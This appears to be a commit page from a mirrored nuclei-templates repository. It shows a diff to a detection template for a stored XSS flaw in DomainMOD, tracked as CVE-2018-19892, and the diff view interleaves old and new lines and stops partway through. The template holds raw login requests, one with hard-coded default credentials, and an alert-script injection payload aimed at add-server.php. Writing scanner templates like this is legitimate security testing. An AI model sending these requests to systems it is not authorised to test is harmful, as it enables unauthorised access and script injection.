daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2018-19892.yaml

patch-1
Ritik Chaddha 2022-07-13 10:50:04 +05:30 committed by GitHub
parent 2f0d1dc796
commit be43e54fe7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
cves/2018/CVE-2018-19892.yaml
View File

@ -1,59 +1,46 @@
id: CVE-2018-19892 id: CVE-2018-19892
info: info:
name: DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting name: DomainMOD 4.11.01 - Cross-Site Scripting
author: arafatansari author: arafatansari
severity: medium severity: medium
description: | description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters. DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
reference: reference:
- https://www.exploit-db.com/exploits/45959 - https://www.exploit-db.com/exploits/45959
metadata: metadata:
verified: true verified: true
tags: wbcecms,xss tags: cve,cve2018,domainmod,xss
requests: requests:
- raw: - raw:
# - |
# GET /domain/ HTTP/1.1
# Host: {{Hostname}}
# Content-Type: application/x-www-form-urlencoded
- | - |
POST /domain/ HTTP/1.1 POST / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
new_username=admin&new_password=admin123 new_username={{username}}&new_password={{password}}
- | - |
POST /domain//admin/dw/add-server.php HTTP/1.1 POST /admin/dw/add-server.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: https://{{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=
- |
GET /domain//admin/dw/servers.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=
- |
GET /admin/dw/servers.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true cookie-reuse: true
matchers-condition: and
redirects: true redirects: true
max-redirects: 3 max-redirects: 3
matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "<script>alert(1)</script>" - '"><script>alert(document.domain)</script></a>'
- type: word - type: word
part: header part: header